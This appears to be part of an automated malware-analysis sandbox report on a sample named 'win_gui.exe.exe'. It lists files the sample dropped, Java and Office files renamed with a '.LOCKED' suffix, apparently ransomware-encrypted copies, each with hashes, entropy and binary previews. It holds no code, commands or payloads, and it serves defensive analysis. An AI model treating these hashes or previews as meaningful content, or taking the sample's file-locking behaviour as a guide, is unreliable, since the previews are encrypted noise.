                                SSDEEP:48:etR9+jiI7We7rL7Q69t176qYd0jcYOb64Q51mbsSpdlK2+kv4/IhNqjAQHBlp/W4:q22IWoQ69tLwWcYOb6312sS/skvJ7qA0
                                MD5:90E7CC6A7F06415748913FCD34C3ACC7
                                SHA1:AC51565ED6160248DB34E443B7069EDAAFC15DA4
                                SHA-256:ED060DA27071FC964440C16A4B67489E496ACE3DED6E3B97D9FA4A27DCCB1681
                                SHA-512:7862524A77345891739F7D59969D3BFE5316FD6EEAF5F8600323B0F02CDF05CEC6CD089B5DA09712ADB6B492C008F8992E43D0222203A64411CB987E9193B33F
                                Malicious:false
                                Preview:S3.....%d......:,..$...YA.Pf...M>d.g....].7U8._D........R.E..e.......F....J.d.FM.{.....8.j....1.{b.r ..9W0P.%i.....{.....k..N1...M_}J ........'.............7..6,o.h.T...hC...Kk....-...^..MK7..;'W.o.sEY.3.]..RC..*..-....A.hz...~[...d...........U.....lY.)..;p.w!.o...bLv+.H>:...Eil.E..l]6.8....6.eAq*.(..I.G.*.0~<...B9.O..1..g...B..V......|X..'=.........v........8r..0....|wi...._l,...g.Z..4....4.B.@.;.>.r..........i.{6..9m..c.......36...R...,.r..6.....Y!...w3.... .@..1.hc..y..F!..Ji...p.l..f...sTq".;(...O6._..O.}_u.JK."F...........H..R`......J..Y.{:.5.O=.........d.~.9..P.OE..0..E.. ..(?c.2.|......7..S.h...Sny.[:..>P...~.....aHL..f...zU!..X.qpc..WN...}.Q.........A..jq.,{....e....&..>.._..?{<...ik.....Y.Q,/.O..Cb%J.h...^....N.{?C..p...q.....!.E."...N.v......]..q....c..x.3%5d.j.DGN'w4.[`....e...8..uS..u...7._i.G~BLY.'.JAv................F..N.RwP.X....s.4..["N...U.]..e}...l....i.............(..*.R..vI....#C....?.......j......C..

                                C:\Program Files (x86)\java\jre-1.8\lib\management-agent.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):990
                                Entropy (8bit):7.77280451964711
                                Encrypted:false
                                SSDEEP:24:1RqPIWc6DN/mHhgmz/wpDyYPGTNj0hOHAVMJg6WXs9foQ:OPIWREhgG/WyYu+MAVMJg6TR
                                MD5:C0331714E410237DAE63A4FF1B436053
                                SHA1:6DD35CFB2045FDEC94E07F56A99FC4E06A16AB3A
                                SHA-256:1FDD59359821EA5F1C6C367A4FF0F2C484B7681F5CC80080502EB4FFEBC93FFC
                                SHA-512:87E426CC50EB685E0CC2F74D484B52B69D3E0BBBDCC78344F89E8314FB692D1E2929A01597C99424BB11A35AC2732B3E00AA8E0594BAF7705CF218409487B8AC
                                Malicious:false
                                Preview:...,T...X......E.3.....H[.G.OK..\c#\.U`K...u...m..[O.il...4:...\:....G...,..-..-.b..~.BR........NGgY.....{b..+.%.....a.R.q...Ja.2..Yn.W.K........Q{V/.+...........H.4..ktAB.0{)|8..COUXPz.........l.....g..:.%[....h..y......9.n4<+S7.p..oH.*~.d......8-d...Q#.....M..B:..F.f.....G..{k+..)"....=.Us.......>...t...|...Bi.>.d.X.h...9.{..I..Y|.....jR".C.c....J...x.V.(&.P....}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N.A..\TU....w.......X..-. ..P!.!d..u~...................fk.W...f

                                C:\Program Files (x86)\java\jre-1.8\lib\meta-index.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2734
                                Entropy (8bit):7.932272661252192
                                Encrypted:false
                                SSDEEP:48:QVxFqR9/a57HYPkSYN4tvfwg838HBoSaBqdevsaueEJvv70fMcYJ+t6y/WyYu+Mr:XR9C5rMjwehixEav4vv7OYJ+tdevuAVo
                                MD5:81005A9D5586940456AE2B8EB56D0B6E
                                SHA1:C58744D86B3A4146DB245A232606083C511DD5FC
                                SHA-256:7E9F1C1B1269961C95D72F46938BD0A25F8A633C01C42596335089BB6CA125B4
                                SHA-512:C8D179C366F2CF5FACE3847B8787763280786CE624EF6DEF4E884A89138FD8A1AEBEE68081C113D06F5D2D06233572725C4DE1C99D064774DD59763E8261F1D3
                                Malicious:false
                                Preview:.Q......E...t...|.R......8...P.....X..).`..Y..?Ch.....7..5..(.>&....x.-c^.*....D.U....vvk..).q.88Eq.u.%..z^....<..m{!h..c.........E....h.R...6hRv..%U.*q...Pd.'..U..x|.yK.sEB..d.Z. E..C.<....D...:......_Ci@^g........j.6.n=....H*8....|...gt .......y.H.."D.Vx..6W..~P.od.~.b]......B3.....K.....?b..nk..E....Z.!..El.-3.i.2.-......}.aa...W.MuL...8..yy8S..........G;S....vl".p.\o..& ../@8.Y).).......r....a..[........^.z...N...$...[o._..-Y..OW.i.P..b^.....z....e.]\1..=&..7.j.KT..=..'......S....c.3.MRVPw......$_.W..#..aK.....sPt.0~1z...I....f.~...y...".....}((."K.9t.+.s.+Q*u..>..2'.D.&.....7..........4..j..J.G....>...Y.....P.\jf.un.H.M.vQ.W....\14......7._..._%lw.F.q.y.iM.J.+!..R.M.y.&.uiw..C%...zv.i.v..`?5W...b...597.L./.fH......d.<!.o.mn..)..7$'...}lWW...y..^...W.T)u..o..U....V.Kp..N..2.s....\....s....0.U......q.`...F&.F.wJ...I..*..#......z...........m...7.5/.h|.L...V.S.lxE?s....\..o....p."...|.[..?bB..(sM\.,.....e.q`.$....

                                C:\Program Files (x86)\java\jre-1.8\lib\net.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5960
                                Entropy (8bit):7.964383265374068
                                Encrypted:false
                                SSDEEP:96:1Kyk9J0+L8NMiAjT2YzSR7tLwtqL935FpLsyi6CvLiGpZH5eWeV5I9evuAVOl:1TklLYMtjTZzS/LwtW93Ty/67mZeo+VQ
                                MD5:8B427CE184C8DDB058E23A5549F26A7F
                                SHA1:2E668B1B446C6E4D8A6CDF7E53D158D0AD02679A
                                SHA-256:A44630A34767E7D704DCB654042B53D34E1A0B2CEAC9389E823D79B7158D9376
                                SHA-512:71D05D4DF2FBD3ABC5F073FAC378952E903405A4F84632A5DBE335A03A3E64A5AAB1C13FAA52BD32577ED1670FEA9E34FF1229432C826E9ED01B4C06C5CA0C0E
                                Malicious:false
                                Preview:.~..1.........j..di....Ag#Pp4.xg..6..i..>..5w.$. h..Wt...a.H..1...#.......[..w..j...x.....\......s7...............NwSWo"(^1g..?[&.4..+...<.ld..o=f...'..7....../........q$..l..4..I........C.L..M..~..\Z{..{...#....>..2+...7.@"...:...R.Q.>.T.N\..S.1.....3g...V.....(.jL]..."5'>..\.r~.&.e4.yg.*S....J....4.1N..f....R......~m....{.......|..o..n.q.#..k*...D.'..p..D.k.ah..&...q@.v.....&.(.....d.i $...9....QLR......R..+.T...u...f......a`....2..cZQWK.....H..i..F....=.Q...fs..{,L.H.5.......FL\.{..(...Tc6..GO...dv`srE...=...g..)Z.....ip..G.b.. .k..\.x$...U...7.VM&.s.K.{....|@...~..B|..cZ..3.lV....F..[.....-...1C..**%..:..#A.-.,....Dm........\.=....xV..KAUE.......\.;.....L.L...6....#.z.]..OI~A`...L.N..O..~;.RVA1."..Ak.N..]M.....E.!H.......l.....B.P.p.3d..E.]]....f..j..|..~.........Y.....v..m._.m..../3-@0. ..S.C..K....M........_..A6#.....e2.|..,ta@`.ts..}.!..7.A[G..a............r.R.g....."..r.....2k....b.xz..9.t]..4.;....n...;..;C....G...V..M.

                                C:\Program Files (x86)\java\jre-1.8\lib\plugin.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1925397
                                Entropy (8bit):6.886058879417841
                                Encrypted:false
                                SSDEEP:12288:6yKVNV4ajgNA8T33jVQSWUNZU4sVa7pm8gP+/G5jyvspP8+swnaCG:VKVP4GgNZP5PZQGm8lG5lSQaf
                                MD5:5FDE12316964103B34259CBAC940CE88
                                SHA1:535DED448C7759FDA1BAE748C16D8C6661B839BF
                                SHA-256:31A8A50E7E9A203ED3DB70E94E3BC1F3D07CCB42D0A86BBF292251D6137ADE5E
                                SHA-512:BE8284A1D98D41CB5243CC32A5BD112258FE61EBD183253E4BF648976EEFB342A7639A8F2D71CE53070133DC3BE1936A0FF9AD159814695857FF9E88F7FD2664
                                Malicious:false
                                Preview:.~.../.tZ+...Q..&.o.j..........;..x7.G.K.l.6......QL..@....F.R..B-.*....9...*.K..w..@...t<5....8E...W...6.J.F.~e`..Zi".`.4g:D+.unlKs.@5.B(z......N(....c.g....|T4.{i.`2).|....C.m.;.u..#......G...%...j.X..j.4Q.dL.a.&L............ $....ee.L..6:.tO.P.......+..pA..aOd.L.8..y....:Y....-.W...4{...E0..e....^..Uf0...5...W.....{...;. /.;..6....YT.%*.=.C.7.5x>..;.L.2.:.z.z.E..@.2....j....yX.?.o.....Bl>.JH[.d.xO...LQ......K..x.KS..hJ........z..K...t..@.v.......W};.}`...YrR...........L...d;..~u./H.OkT<561?.'.._......d FN.,.:.k.D..L..7..Th.z6w..m "..g.:r...+W..7zi..>.. s.u).'#GVl.O..0.e..T..3.............9.S.U]~..R.......b.\.RP..o3o..A.T.[1....vM.F..S..`c.30../......z..F...b(..6..L.Pa.....y...*tU.(.j.L..Q.)...H..G..q\...e]..8.6..w..Fz52.Q?.8v....cSAq...$..66..G!...=.8i0Kr..>.0......Q..V....Y.....!Q.:.m....efi.[...>=.*..../..."...~|.k.;.Z.7..]|6..f....3.w...e.E*Gb.[..g.M.H...!.<z.Di2}.2...z..\..%r.^./.j.4$....T.xo.......X.).ge...;Ky43..2...{.V/.e&G.%m....6..

                                C:\Program Files (x86)\java\jre-1.8\lib\psfont.properties.ja.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3404
                                Entropy (8bit):7.9385087438793
                                Encrypted:false
                                SSDEEP:96:CxK4e0jT+EoTP1z9IqjPpbeNExpRRjd5Mic1mevuAVOb:qK4eCT+3TP1ZhpbeN4pPjwzm+VOb
                                MD5:4B7E66843B2838CAF18D58025363EE38
                                SHA1:5494F0DCDB3A54801CD18963CBCFFBDEA46F4EA4
                                SHA-256:6879F99E7CFB772D914C55BE74358E5F4E5BD2B26D5779DCD6BBFB28523AF679
                                SHA-512:34308D4511A2FCE5EAEC2FC59639981DFB474930A158CD81EF0CC7C3AA4EEAA19AA7CA5F0ED908991AB0FB8696993724BB22EAB7C97FF3702A773F799877EBD2
                                Malicious:false
                                Preview:.$Q....H%..6E.K.....9>..oahr...zk...1.n..m;`..ym......il..v....]z.m....&...J.@5..i...DrO.Tj.....'"......}...........M....$.%...."nw{...Z..x.W..+G....3R...<W.o..G@+*.........Q.qR-...oI.*...x];6%.j.J.......B..IY.Cnbq..;..Y*..O..]5.A..........q..b.//...zB+.zx...c..g..........Lh.6..]. .oyC..C3'.j....* `$&.L...u...OK.)h....nA+T(v.B.mB.....:...SWz.!..Lx...BR1..[5.[.{}..E#.]..B..a}........BbU..>K....v.!.V_=8^..:7|.j.X......:.VV4..>../..b.....W.^..=sM..1.X@cQS.eb........x.w.....#..q.5..z=........%...6.h.M.....5.F-.z...s;....~(.S.........p..@f.]}......K.Oy..e..Es.....>@!9.e......lr../..8.....z..0}w.Af+nf.".C. I.#6.v.p...*....q........l".ei....d .-.^..Uh......%....F.<.gq.sc..0........XL.=.r!.R.+.i..x..._...s.X..B.!>`.4.....X$............Z.......$.?...6..2....,Fe.v....,....f..`......9.#.p....T@13...F....y.B....9....^,p...C.7..B}!*C......6....Q..(N.)Z..(.e ...K.3..>..J..r..'...v..#..7..5...0.r.>.a.......@!..z..~C.X.5.)Y.V....c......Z.Jp.o..q.o

                                C:\Program Files (x86)\java\jre-1.8\lib\psfontj2d.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11001
                                Entropy (8bit):7.980715298963405
                                Encrypted:false
                                SSDEEP:192:e+RVzkU8d4lW3AW13V2UnVbZnh8xgQOWXAkQ+f7eNjZ7RqbTWx/+VOh:xCgAZ131VNh8yL1kQ+fihZ7kbC+VOh
                                MD5:3ED512D3C876C7BE8568373149A483C0
                                SHA1:20B1D3527E9D5132A832788D9917B801A6A67FA0
                                SHA-256:15A8C3A67411D4D0CC923DF7C2849BBAD416F6178E305F1691D80B90B51EA18F
                                SHA-512:CA752D6FE9E67F96156CC8EF1ADF410A81242D2B806F8616D0F1E287347F149E47B9FDA8E60DFE92C4643A0496A032A924B6874BA1291F07816A49CF10EC0890
                                Malicious:false
                                Preview:....";qr&..qD.=.se,4.......c...Z........j|hh.@...w..v.G.a ..A..:.gE...e.{...CpDHY..^'..S......AE....x}...q..C.CmK......$..M..vI.eC:y2/.f..`.^f]...>[o..,...Xba._.^..9"2.....Y.(.b.N.6..r..E..G...`,.(..}I..E#.....'.3N..o#..7.5ZN..kc..B..>...]M...|.i.s.+....b.4......./.o4...C....i-9@...-.....!?.S.T.....6X...e...Q...9..I....iC...w...~.....w.#N...u.R..."..}X....@'.;..c..s.x.J:.X.%.%.....IU.c..F^.sz......1b..hC....).R.).M...i.0<OV.Z...*.#.Te .sx....a.l.H...uA._:..Ws...U.....}..5.\...!.5.. x.(0.~{.^......]a..3d+g.<n.X..>...xcJp@.oG...-'......{C].T..."..j.a.......X^.,._....C.d.g.)b.a..&.=X........G...j.x...v Y.YU....&?.~OI.U...8.8Nq(.y$..J......E2.N......P.7........B..h.@.;^.j.gR.3..{...S...i*%.]sw)..F...B.....J"'.pe.7...@...Y.....n...,3.Z9.mDPiC....B.>....+h.).......L.U...9N..{.y...?..........P..!b...j.,...m.w..e...:.%.{Pc.X.<...90.....b..B^].........4..tj..4.G.>A.G.BX.{.....s....Ex}..u....._./..oG.......u/5i...kL.0...i..G..0..?WA..~.%..M.>UY3....v.X...

                                C:\Program Files (x86)\java\jre-1.8\lib\resources.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3548406
                                Entropy (8bit):6.798143809423666
                                Encrypted:false
                                SSDEEP:49152:+4zJYGPpxjOBAS++jqWr739qhgO587exNJrGAhiDwthCHJu9r2JcaD4oc2HmtjLS:+b19T1P2YqSKlOeu
                                MD5:25A311C95078B93CC42F6531D3A612A1
                                SHA1:00DABEB03D68B501CBCD2EB7A8ADD4ABEE9C7FF1
                                SHA-256:84FA49B89AAB47DC8B3469F4B3693A6EA9D6CC7D81EB4B643D70E922E5B7E5DA
                                SHA-512:F16E3950475A374C6C938523CDAFBCB288F082A38E5BA17C11898251713D4F18C2A433DC0B963E47863BD814DC74D38FAED358366CF5CA99A009EE5AAC3A760D
                                Malicious:false
                                Preview:G..jd. ...'..Ou...-.....S.c..YW.#..t....E....Y..+8..."..@=>k.OJ..V."..H.......z.....6.{e...X......M..U...T.JO...v"....Nm.H..a...g......g{...1L.Ea.\.......hd....6.a..^.*q..Ot.......DS.s.n.Zw.T.e...I....bp.......u..t.Y..5..$...i....7..7..L~t.k/>2._....,=..c.V..L..^...Z..[*.F7..C.....)..]6`d;W......F....*..>.B#..u)^..dG....V....0...."..@..^..Y.<..../Xk.qb..Jd....w...*...j.`dw..L5....I?.....sSY..^[8..O..w.]B...N..x..............\....T4...k.L2..<. .C{...y\rO....Q..fk..CM.z...l.E....'...;.L'.v.X..Y*R`<..Hl.{.....5.oZ..n9v.kd....wQ....,[..G..L.{.Q=.`;...Y`3.X...(#.%..P....b..G...7g..~.H.x.L.....eL].'..]......62.R.n%.(.....kP. ..P....&J.M.'8<..#.l..x0._.RN....3.TE...xz............J2..L).H...o.._.t^r.ca\.v.{.'. .:9nt1F.~.p...t>N.....u]fZ.=....I..zbVu=__.z..9...l..;QE...Gi...Mp.s%.Ht.lD....2.....v.al...ROAB.".S..+...p.z..+\K........E)..g=..y..e....+&.......a.&.in....w..n.v...9z.[..5...R.=./O..*...g...[.-..(.kp...|=B..l_..Z...w..n8$.P.{.4.=5i...}^. ..Ht

                                C:\Program Files (x86)\java\jre-1.8\lib\rt.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):55854590
                                Entropy (8bit):6.820564324964731
                                Encrypted:false
                                SSDEEP:786432:9zSLP+/BSlfldU/7GGmAhAIQ9r5t2UQ6q6px4bx:lIP+6U/7GFAdrx
                                MD5:869B1F15E03E8EDD404CCAEC44BCBA87
                                SHA1:6C0890CFEF4731FA1EA2B8AF0F5F7F6DDFDA9BD8
                                SHA-256:C4B4BEEC90E7FB6C2836777BBC01B7DEE0F69E4D229B5B1A98064BEFE569D2C8
                                SHA-512:03C7B53CF5F54141A931DDDFD4B2FAA59A6490F811EAD4949EBA75FC10504316DF90D52396F5073DB3B16A7F3C3FE134ABF3FEDCC54B547BA45764A9874992B2
                                Malicious:false
                                Preview:.u%..T. ...X.t.g.g7J..hG......3.}.O@.bH..\.Y....!.\....m..b.z3G............a.\.+..x..C...3s...U..z....;.Flt.....7.._..c..].^/.c..m.;0.........?..:.o...@....u...g.Gw.w.x....[..!..5..b.....3.Q..c.`....wjWJ.B.........K...Fj\t....L..m;..fG...8...Q..~^4...h|.....A@~.).. Z...~.c!.......cV..V..F...:Q/......tf.|>0.....Q.p)...l.....U..9(.....q..pM...z.Z.F-.{...m...5.RL...r.1....*...".5....R....N...ft.+.if.....uO.=.30....B../Z.....,.{]&..5.Y6q..a<..s.K...Pu..].....(.8.....o.c...r...;.....f..8XE..p..r.L}..u.1.7t.-..!'I...A..=....4NJ.r.&.J.o....\.}U>.80.e.*.#^i.c...IU...6x....?v....}...h.d.......&e.1..y.fls..q.F..~.%..s.u.c.......N..,..h;.n.+.y..7m.....l..s.;..@5$.P...<...w~w....'h.|\....%.|.:.....uN.....Wh{........o/....N.......G....,....,,.#..O..jv:Lr%..*v...?.s...Kt.U{.......#,3.Ax,..Z..=v..J.&R......Ky......?.^.+b'.}......g...S.F......<.w"[...$`.F['.e.......:..l..v.........Ot.%a.q:.!`.Q.}.h.)~....\E...=..y. .G.Z..KE.k..~(.....30..59<2

                                C:\Program Files (x86)\java\jre-1.8\lib\sound.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1818
                                Entropy (8bit):7.8802743426051345
                                Encrypted:false
                                SSDEEP:48:YY7YuGUJ2ugW0O8Z6nhL/0X/WyYu+MAVMJg6Tc6:Y4YGMZy5/yevuAVOc6
                                MD5:79D70B8B66A730B1EE3B63A2C2F1CD7C
                                SHA1:2565559F82A98DA019593C7D614385D554D16DC9
                                SHA-256:BCBC2BB3D8BD42D717BB00BBB076F5CC1627AE0DE78F71D7B4C81A7FF5E38D7D
                                SHA-512:2235846324DF0B96F488B1B54D434533CAA4EC85981AC45664FA406B7B62CDE31A9D0CAC0C0B2E479EC691E6F6B5A4E254530945C59228DD80489CF98B990BF0
                                Malicious:false
                                Preview:.q...[.}':Y...*..y>...u......s7.F..(..OE..J..<..,..2..3..",.....w.....w.:X..WE.5&H=.2....>..X..I1g@..E<...R...y.j...!.2fL.......!...O....E<-C.,..S3.X\.j.|q.g..|...z...w.G:/...i..@......]..d....g..w.]...8..k.....h.uit...\........{.Xx..uq.MPp,.0...*%...TI f.q.|v6..PS....9.R..l^.b:..^&.6.?~J.kY../.....xBV...K..><.?.%=Z.........=..~.....f..........4.....yp..._Xo.....q.m.y..qQ..{.L*x..3.c.Z.Ol.F...<...r..0...`..7..(a...X....x.....`.....6P.)s..8.|.0.5.y..C`.5.uA`r.Q0......_b........\.>h.bZ8.f!}.....N...j..Dz.<.L.Si.V#.T......cX.a.E.q......*u.T....3.u.}.8. f.xE.V....U.X9,N..x._.8.F..E.......z..V.%.J...v.AR...0&#..cM...;...FL.g.5.a.*..O.}..\fU..%.[...|...R!^Lu.Z..DMW|...A..I.YA.L...k,.....Mc`.p..{.K{...I.i..t..5.dU....B..j;2..yk~w....N.A_.........9&.......w.g....k..5!"....T..Ny.........4....(...=..........J4Y.F.>c^..o..7.y.3x.n.'c..p.}_^.F..z....0g...l...T.4g..X.@.. ...m.....t9.. ..........#....8.-...)....6.RbFf.G..I.F8.I...)TK..t..:....5.2.

                                C:\Program Files (x86)\java\jre-1.8\lib\tzdb.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104393
                                Entropy (8bit):7.9983503100924604
                                Encrypted:true
                                SSDEEP:3072:JqMW1NVo9+bv/m5hc/N0j+uINdBz/RCRplclIOPeL3:It13MYv/JN0qVaOPm3
                                MD5:2CADB11EA3B61985BE6A61D9C3F1E877
                                SHA1:4BAFE242019826DFA83D6A8E254CFA89D88BE65D
                                SHA-256:A8276D7300997C5E99FD732ADEE53614ED65054B493C2935BBE21F02826470F7
                                SHA-512:952AF17E65B45E28706E0504CEACAB354A2F2C60EC5C9A4C004546A45E8E48175E760BCC8C0483F09A970F73CDE80126A606524B3A1D915B9DD4C92C07DB4119
                                Malicious:true
                                Preview:... .(-......I..C.........s..y:....y.E..a......p...Ga..)....8Xp...f..h...v.....~Y..e....=..c....O...K..`}..9.h..6.o.[.../-..E.t4s/...W.....p...e.}.....z|.Y...K.c....^.V...eA?OG........j.~....BS"..\V*...@.dr.C.....=.....vi.Ue ...UU.'.%.,...H>..'.7^.?W...6....7..=..Y........L....0O..q`v.v.y.t....^P..+.Yo..WR..E.Fm\.....&s..@.s.=..z..m..D.\.z....|8..<oK..<...j..._3.@...u.wo.P....u..P....(..(...S....<....P..tR).........H..X.<..9@......E.J..%+........U.....o.%KB.m.[v39..`3..3K".q.a..`]....<...W.....l...2..]...".pw.f...Z.....@..5..'...A..i...Q.P.%.....W-.^.4.6[...-zhK.hT....e.....jC.F~l..J......L.~.....*.pzU...MP...m.>...Y.'f..wk.i.).T...JN.!.5...R.c..j.+.Ad-.<U..,..."o..h8q....f..5.....{I..n....W.....8....V<c..|....w.~..OX..I4.~..)...u{.k..9...[...iTAu.j....*...l..3.$....I.h4.[..r.O3.Q..\...E....D.#.u.M..O...s.8.(..S.@-....3..;.....`.tk.q..Yi...d..Q].v....n..M..h.....E=.+...X.U.L....j..7..&D.>.;..2.B,$P.8@...F~n.!5...q(.....;:Su.d.U.....

                                C:\Program Files (x86)\java\jre-1.8\lib\tzmappings.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10185
                                Entropy (8bit):7.979443429815771
                                Encrypted:false
                                SSDEEP:192:dPNgptijU5m2I1XFUipy5uj4itteg3WA7lQm0qcCjk9GgG4ZgiH2ZOrlxN+VOCk:dPwtRTI4aygj4ibm4lQmgCjzgG4ZgiHF
                                MD5:C4991D942E9BFD2F3A5EF0CABA9A3939
                                SHA1:11130913927AA9838276DEA9CA1CF9FF979640DC
                                SHA-256:262A6BF82769A0E9DC1CA074968AEA74B12B467DFA589C36F83EABDA47AB4109
                                SHA-512:B2646DED61A0DFAA86FD41A26CA0DFCA9DB0546E504C1E92061A5983141C05B95EE811B0855B4C1FDF668CE57DFFED2C3DAF5960DE8EBF09C9120D6163D2CC7E
                                Malicious:false
                                Preview:2.U?.... thx....f..U.AT.....=c.x.....$...b`....x:Nf.pa.EAE......X...o.....#W....XQb5T`....0HaP..F........,R=..b.<..[..,.'&.Y8.:....W..6....}..v.Ez...*.R.8 .0.!.N.=.dz..B@iiF..f.Y$.!m.U.*o.a.;.3Jn.C..N........Y...>U.);.....x.d...m..,s...{i.....:y_OE.....r..@.O.].D}N....9....1.=..?.}.6...T.&^.A.....>.J..m..y#v.V...U...R....).]..g.....S..!../..9.k.2.FV:..r$.<.J.o .p...c.<0.n...+.&..Q..yT..U.a.woU.b...).+..I.qZ.h0...V.zK.....?....0.Z.....4..pR=}lf..A..L.|....... ...K.5..t...!-.....X..z.....7..i...%s...].L...F.u.5.[.J..h...m..u.@>.....Z.......L.~W.qEm.]w.h".IK.S..I.0Z{.j..rK........]&.....e)...K..T..c+B.......T.I._.X..@....[Zy.s.....&v.........9-..3....=6...6.l...C.q...1Jj.=6.y...@......jL.2....v..h.N.....QvD.f.f....t.R.3g......-..(.....UMSZ^Y....s.W!....M.^..{...6..9...o..@U...5...}..K...%.._.....[5.....U.....3...#...*pnj5....u*..".....T.`...P%.gY..7.Qez.H.v\..i.c.9.l....3t.h.+.(=.........g"..<..+.).....6W.4P.:..M..5>T...+..v..t.d.. ..l.*..'.

                                C:\Program Files (x86)\microsoft office\AppXManifest.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5036392
                                Entropy (8bit):6.335390285867676
                                Encrypted:false
                                SSDEEP:49152:4d85mmw4RuS5cwD/Sh3NI3CUViwc83NIhvnCtd:4KMmw4EStbnfiTO
                                MD5:D221E3A6F4DE1D4A66FC15B259321A93
                                SHA1:8B275024F028460A06C05FDD1250A2DE905B7EC9
                                SHA-256:093AD744F51B3193E7F36D7306BE6AB0FC7AEF72410EBE8E9CA869C65173E7E6
                                SHA-512:A5AC548F998B87A0DDBC091CFF3A4FF361ACC34053B2C19DC168DBC76029E4D8E3BC363095C084AC5CE76BE58F0350B808B09BA7E5984F99F8BED15C2E409516
                                Malicious:false
                                Preview:?..._.o..(..<G.,....!L.=.S....P.....\r.j.v...e.@N..C.......>.6..a..g]..P=....*E....F,'..f.9...)........=b.e.>.L&..w....)......-......9P.D..G.......d;x..5....0!....s.5..AG"..9..K.:p.&....Ys..)...%{K........S.....<0P_.w..<......*......h..H>C..H........z.a..1.9..8..^..mi[..$...W.6)..2..0[H....c..7N....._.. .L..0...MC..w......C.&....(5.B..(e....o..}yF!%L...k..-.89.UI?<.En.M'...#.-.OH...zx.....}g...BP.wuO.......T...W".... 5.A...._.?.....@.*.'}..A<~.......|\.%/..2..%..m;...IO.&M.7`.W...3.;..K...<`}......w.;...w...8....@..0.....!.c......S....|."{-.@...G...BQ,!(!6K...J|r.m..g..@..f-..h....]..'q.f.....oKM.,.rw..|.?>......8.Zw.!.P.sA.X).1..C.k........:l.g....Y.'.2...m~ .*.$.O......'..V.V3...(V...P&T;<r. .Z.i+G..ay,$Kf...<<...z..,.......z...D2y.9.#.........s..\?..,rsS..x..f ......C.....R{.@....*..^3...c....M._.VBJ...r..^.a.j..o..}2@....6O0r.......}l..K......n %a.q8.t{.J...F.C....P..OQ.d......%.D...d-[.7......c...<2&....}..{,Uz...~._%^...4!.....b.H..z...

                                C:\Program Files (x86)\microsoft office\FileSystemMetadata.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):889
                                Entropy (8bit):7.698642389458632
                                Encrypted:false
                                SSDEEP:24:gDNsDP3EijbF3z/wpDyYPGTNj0hOHAVMJg6WXs9C27:INsDP3Eijx/WyYu+MAVMJg6TX
                                MD5:362E9AB21544B0AC4E68F5EA458433B2
                                SHA1:F070CB4F25F118D3ABDCBBDE9067749502E35A83
                                SHA-256:B138EFC0D4F2A440CB42D31AFD2A2CAE8A11C4BCD0C91A00BF630EDDA66552EA
                                SHA-512:5DCF96AA7A6ECB15103EC8AB25B010483A6992100096099600A691B53A086921CEB6FF1283950D0E1A5CAF8280F5C65A6CB191E2393AA63C06BA613470321659
                                Malicious:false
